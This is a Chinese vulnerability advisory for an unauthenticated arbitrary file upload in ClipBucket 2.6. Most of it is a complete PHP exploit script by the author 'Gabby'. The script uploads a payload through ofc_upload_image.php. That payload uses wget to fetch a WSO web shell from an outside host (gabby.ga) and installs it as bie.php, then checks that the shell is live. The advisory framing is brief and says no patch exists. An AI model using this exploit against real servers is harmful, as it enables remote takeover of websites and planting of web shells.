ClipBucket是开源的自由视频共享软件。

 

ClipBucket 2.6版本的"/admin_area/charts/ofc-library/ofc_upload_image.php" 脚本不需身份验证即允许上传任意代码，可导致任意shell上传。

 

受影响系统：

ClipBucket ClipBucket 2.6

 

 

测试方法：

警  告！以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#################################################################################################

# __________.__             _________                              _________

# \\__    ___/|  |__   ____   \\_   ___ \\_______  ______  _  ________ \\_   ___ \\_______   ______  _  __

#   |    |   |  |  \\_/ __ \\  /    \\  \\/\\_  __ \\/  _ \\ \\/ \\/ /  ___/ /    \\  \\/\\_  __ \\_/ __ \\ \\/ \\/ /

#   |    |   |   Y  \\  ___/  \\     \\____|  | \\(  <_> )     /\\___ \\  \\     \\____|  | \\/\\  ___/\\     /

#   |____|   |___|  /\\___  >  \\______  /|__|   \\____/ \\/\\_//____  >  \\______  /|__|    \\___  >\\/\\_/

#                 \\/     \\/          \\/                         \\/          \\/             \\/

#

#

#http://thecrowscrew.org

#################################################################################################

# Exploit title : ClipBucket Remote Code Execution Vulnerability

# Author : Gabby

# Dork = use ur brain ;)

# Vendor Site : http://clip-bucket.com/

# Software Download : http://sourceforge.net/projects/clipbucket/

#################################################################################################

<?php  

$options = getopt(\'t:n:\');

if(!isset($options[\'t\'], $options[\'n\']))

die("\\n      [+] Simple Exploiter ClipBucket by Gabby [+] \\n Usage : php clip.php -t http://target.com -n bie.php\\n

-t http://target.com   = Target mu ..

-n bie.php             = Nama file yang mau kamu pakai...\\n\\n"); 

  

$target =  $options[\'t\'];

$nama   =  $options[\'n\'];

$shell  = "{$target}/admin_area/charts/tmp-upload-images/{$nama}";

$target = "{$target}/admin_area/charts/ofc-library/ofc_upload_image.php?name={$nama}";

$data   = \'<?php

 system("wget http://gabby.ga/shell/wso.txt; mv wso.txt bie.php");

 fclose ( $handle );

 ?>\';

$headers = array(\'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1\',

\'Content-Type: text/plain\');

echo "============================================ \\n";

echo ":   Simple Exploiter ClipBucket by Gabby   :\\n";

echo "============================================ \\n\\n";

echo "[+] Upload Shell ke : {$options[\'t\']}\\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $target);

curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);

curl_setopt($handle, CURLOPT_POSTFIELDS, $data);

curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);

curl_close($handle);

if(!strpos($source, \'Undefined variable: HTTP_RAW_POST_DATA\') && @fopen($shell, \'r\'))

{

echo "[+] Exploit Sukses,.. :D\\n";

echo "[+] {$shell}\\n";

}

else

{

die("[-] Exploit Gagal,.. :(\\n");

}

 

?>

 

see on ss :

1. http://i.imgur.com/SZGVraC.png

2. http://i.imgur.com/1X0WzeH.png

 

################################################################################&#8203;#################

Thanks to :

Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, my "Dad", my sista Wii, cW3 G4pt3K,

Red-x, Vanda, Deb, Sultan, Meninbox, n all my luvly friend,..

Greets to :

Yogyacarderlink, SurabayaBlackhat,..^^

################################################################################&#8203;#################

解决办法：暂无

厂商补丁：

 

ClipBucket

----------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

 

http://clip-bucket.com/

参考信息：

http://192.168.7.140/vul_2.php?vul_id=24181#vul_affect